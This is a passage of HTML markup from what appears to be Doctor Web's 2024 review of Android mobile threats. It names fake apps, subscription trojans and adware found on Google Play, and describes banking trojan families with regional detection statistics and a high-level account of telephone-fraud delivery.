        trojan, and the “Speaker Dust and Water Cleaner” app was the &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57159&lt;/b&gt; trojan; both were protected with a software packer
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Other malware we found were members of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family, which are used in various fraudulent schemes. The main task of most of 
        these trojans is to open a target URL, while some of them, under certain conditions, can also operate as the software they are disguised as. Many of 
        them were distributed as different apps, including financial programs, like teaching aids and reference books, profit calculators, apps for accessing 
        trading, and instruments for home bookkeeping. Others were disguised as notepads and diaries, software for participating in quiz games, surveys, etc. 
        They also loaded fraudulent investment sites.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/16_Android.FakeApp.1674_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/16_Android.FakeApp.1674_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/17_Android.FakeApp.1708_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/17_Android.FakeApp.1708_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        trojans that opened links to fraudulent websites: &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1681&lt;/b&gt; (disguised as the “SenseStrategy” app), &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1708&lt;/b&gt; 
        (disguised as the “QuntFinanzas” app)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Some &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs were distributed as a variety of games. Many of them could actually provide the declared functionality, 
        but their main task was to load online casino and bookmaker sites.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/18_Android.FakeApp.1622_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/18_Android.FakeApp.1622_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/19_Android.FakeApp.1630_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/19_Android.FakeApp.1630_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans that were disguised as games and loaded bookmaker and online casino websites: 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1622&lt;/b&gt; (“3D Card Merge Game”) and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1630&lt;/b&gt; (“Crazy Lucky Candy”)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Some trojans from this family were once again camouflaged as job-search programs. Such scam apps load fake vacancy listings and offer 
        users the opportunity to create a resume by providing personal information. In other cases, the trojans can ask potential victims to 
        contact “the employer” via a messenger. In reality, they will actually be writing to the scammers, who will try to lure them into one 
        or another fraudulent scheme.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/20_Android.FakeApp.1627_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/20_Android.FakeApp.1627_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/21_Android.FakeApp.1703_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/21_Android.FakeApp.1703_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans that scammers passed off as job-search apps: &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1627&lt;/b&gt; (the “Aimer” app) and  
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1703&lt;/b&gt; (the “FreeEarn” app)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In addition, more trojans that subscribe users to paid services were uncovered on Google Play. 
        One of them was &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt;, which was being distributed as the “InstaPhoto Editor” photo-editing program.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/22_Android.Subscription.22_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/22_Android.Subscription.22_2024.png" alt="Android.Subscriptin_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt; trojan is designed to subscribe users to paid services
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Other such trojans were members of the related &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Harly&amp;lng=en"&gt;&lt;b&gt;Android.Harly&lt;/b&gt;&lt;/a&gt; families, which have a modular architecture. 
        The former can download additional components from the Internet, while the latter are distinguished by the fact that they typically store the modules 
        they need in encrypted form in their file resources.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/23_Android.Joker.2280_2024.png" class="preview"&gt;
                 &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/23_Android.Joker.2280_2024.1.png" alt="Android.Joker_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/24_Android.Harly.82_2024.png" class="preview"&gt;
                 &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/24_Android.Harly.82_2024.1.png" alt="Android.Harly_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;

    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of apps that subscribed victims to paid services. The &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2280&lt;/b&gt; 
        was hiding in the horoscope program “My Horoscope”, and the &lt;a href="https://vms.drweb.com/search/?q=Android.Harly&amp;lng=en"&gt;&lt;b&gt;Android.Harly&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.87&lt;/b&gt; was hiding in the game “BlockBuster”
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In addition to malware, Doctor Web’s specialists discovered new unwanted software on Google Play, which included different 
        modifications of &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;. 
        These belong to a family of programs that offer users virtual rewards for completing various tasks (often this involves watching ads). 
        The rewards can allegedly be converted into real money or prizes, but to withdraw their “earned” reward, users must collect a certain sum. 
        However, even if they succeed in doing so, they will not get any real payments.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/25_Program.FakeMoney.11_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/25_Program.FakeMoney.11_2024.1.png" alt="Program.FakeMoney_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/26_Program.FakeMoney.14_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/26_Program.FakeMoney.14_2024.1.png" alt="Program.FakeMoney_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        One of the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; 
        variants was distributed as the game “Copper Boom”, and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; was disguised as the game “Merge Party”
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In addition, throughout the year, our malware analysts discovered new adware programs. Among them were apps and games with the 
        built-in adware module &lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;, which is capable of displaying ads from various advertising service providers.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/27_Adware.StrawAd.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/27_Adware.StrawAd.1_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/28_Adware.StrawAd.3_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/28_Adware.StrawAd.3_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/29_Adware.StrawAd.6_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/29_Adware.StrawAd.6_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/30_Adware.StrawAd.9_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/30_Adware.StrawAd.9_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of games containing the adware module &lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;: 
        “Crazy Sandwich Runner” (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), 
        “Poppy Punch Playtime” (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3&lt;/b&gt;), 
        “Finger Heart Matching”  (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6&lt;/b&gt;), 
        and “Toimon Battle Playground” (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.9&lt;/b&gt;)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        &lt;b&gt;Adware.Basement&lt;/b&gt; adware programs were also distributed via Google Play. 
        Ads from these often lead to malicious and fraudulent websites. It is noteworthy that this family shares a code base with the unwanted &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; apps.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/31_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/31_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/32_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/32_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/33_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/33_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/34_Adware.Basement.2_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/34_Adware.Basement.2_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of &lt;b&gt;Adware.Basement&lt;/b&gt; 
        unwanted adware programs: “Lie Detector: Lie Prank Test”, “TapAlarm:Don't touch my phone”, and “Magic Voice Changer” are examples for &lt;b&gt;Adware.Basement.1&lt;/b&gt;; 
        and “Auto Clicker:Tap Auto” for &lt;b&gt;Adware.Basement.2&lt;/b&gt;
    &lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="troj"&gt;
    &lt;h2 class="alignCenter"&gt;Banking trojans&lt;/h2&gt;
    &lt;p&gt;
        According to detection statistics provided by Dr.Web Security Space for mobile devices, in 2024, banking trojans represented 6.29% of the total number 
        of registered malicious apps, which is up 2.71 pp. from the previous year. Starting in January, their activity steadily declined, but from mid-spring 
        onwards, the number of attacks started to increase again. Their activity remained virtually unchanged during the third quarter, after which they continued 
        to be more active, reaching an annual maximum in November.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/35.1_banker_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/35.1_banker_2024_en.png" alt="Banker_Stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        In 2024, well-known banking trojan families became widespread again. 
        Among them were the malicious programs &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot.Coper&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;Coper&lt;/a&gt;, 
        Hydra (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1048.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.563.origin&lt;/b&gt;), 
        Ermac (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1015.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.15017&lt;/b&gt;), 
        Alien (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.745.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1078.origin&lt;/b&gt;), 
        Anubis (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.670.origin&lt;/b&gt;). 
        In addition, attacks using the following were observed: Cerberus (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11404&lt;/b&gt;), 
        GodFather (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GodFather.3&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GodFather.14.origin&lt;/b&gt;), and Zanubis (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.Zanubis.7.origin&lt;/b&gt;).
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of 2024, malicious actors actively distributed &lt;b&gt;Android.SpyMax&lt;/b&gt; spyware trojans, which have rich malicious functionality. 
        They are also widely used as banking trojans. This family originally included the multifunctional RAT trojan SpyNote (RAT — Remote Administration 
        Trojan or Remote Access Trojan). However, after its source code was leaked, many new modifications based on this code started to emerge, including 
        CraxsRAT and G700 RAT. Dr.Web Security Space detection statistics show that members of this family became more active in the second half of 2023; 
        since then, almost every month they have been detected in increasing numbers, and this trend continues.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;b&gt;Android.SpyMax&lt;/b&gt; trojans target users all over the world. Last year, they were also found to be involved in numerous attacks on Russian users, 
        as 46.23% of the detections of this family were registered on devices belonging to this particular audience. These trojans were also most actively 
        distributed among Brazilian (35.46% of detections) and Turkish (5.80% of detections) Android device owners.
    &lt;/p&gt;
    &lt;p&gt;
        It is noteworthy that these malicious programs are mainly distributed in Russia not via spam or classic phishing, but during one stage of telephone fraud. 
        At the beginning of their call, threat actors traditionally try to convince their victims that they are employees of a bank or a law enforcement agency. 
        They inform them about a problem that has allegedly occurred, e.g., an attempt to steal money from the victim’s bank account or an unplanned loan; or, on 
        the contrary, they report “good news” about free money that is supposedly due their victims from the government. When the scammers realize that a user has 
        believed them, they encourage their victim to install an “anti-virus update”, a “banking program”, or some other similar app—for example, to “ensure a secure 
        transaction”. Such a program will, in fact, contain an &lt;b&gt;Android.SpyMax&lt;/b&gt; trojan.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/36_Android.SpyMax_share_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/36_Android.SpyMax_share_2024_en.png" alt="Android.SpyMax_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        In 2024, Russian users also encountered the Falcon banking trojan family (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.988.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5703&lt;/b&gt;) 
        and the Mamont family (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.637.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.712.origin&lt;/b&gt;). In addition, attacks involving the banking trojans 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.791.origin&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.829.origin&lt;/b&gt; were observed. These targeted Android device owners from Russia and Uzbekistan. 
        Other attacks were perpetrated by &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.802.origin&lt;/b&gt; and affected Russian, Azerbaijani, and Uzbekistani users. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.757.origin&lt;/b&gt; targeted users from Russia, Uzbekistan, Tajikistan, and Kazakhstan.
    &lt;/p&gt;
    &lt;p&gt;
        Our experts once again detected attacks coming from the MoqHao trojans (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.367.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.430.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.470.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.593.origin&lt;/b&gt;) 
        that were aimed at users from many countries, including Southeast Asian and Asia-Pacific countries. 
        The same audience was also targeted by other trojans. For example, South Korean Android device owners encountered families like Fakecalls 
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.919.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14423&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5297&lt;/b&gt;), 
        IOBot (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.IOBot.1.origin&lt;/b&gt;), and Wroba (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.360.origin&lt;/b&gt;). Other Wroba modifications 
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.907.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1128.origin&lt;/b&gt;) 
        attacked users from Japan.
    &lt;/p&gt;
    &lt;p&gt;
        Banking trojans that threatened Chinese users included, for instance, the &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.480.origin&lt;/b&gt; trojan, 
        and Vietnamese users were attacked by &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1111.origin&lt;/b&gt;. 
        At the same time, cybercriminals used trojans like TgToxic (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.TgToxic.1&lt;/b&gt;) to attack bank customers from Indonesia, 
        Thailand, and Taiwan, and the GoldDigger trojan
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GoldDigger.3&lt;/b&gt;) was used to target users from Thailand and Vietnam.
    &lt;/p&gt;
    &lt;p&gt;
        Attacks on Iranian users were again recorded. These users encountered such banking trojans as &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.709.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5292&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.777.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1106.origin&lt;/b&gt;, and some others. 
        And banking trojans that attacked Turkish bank customers included representatives of the Tambir family 
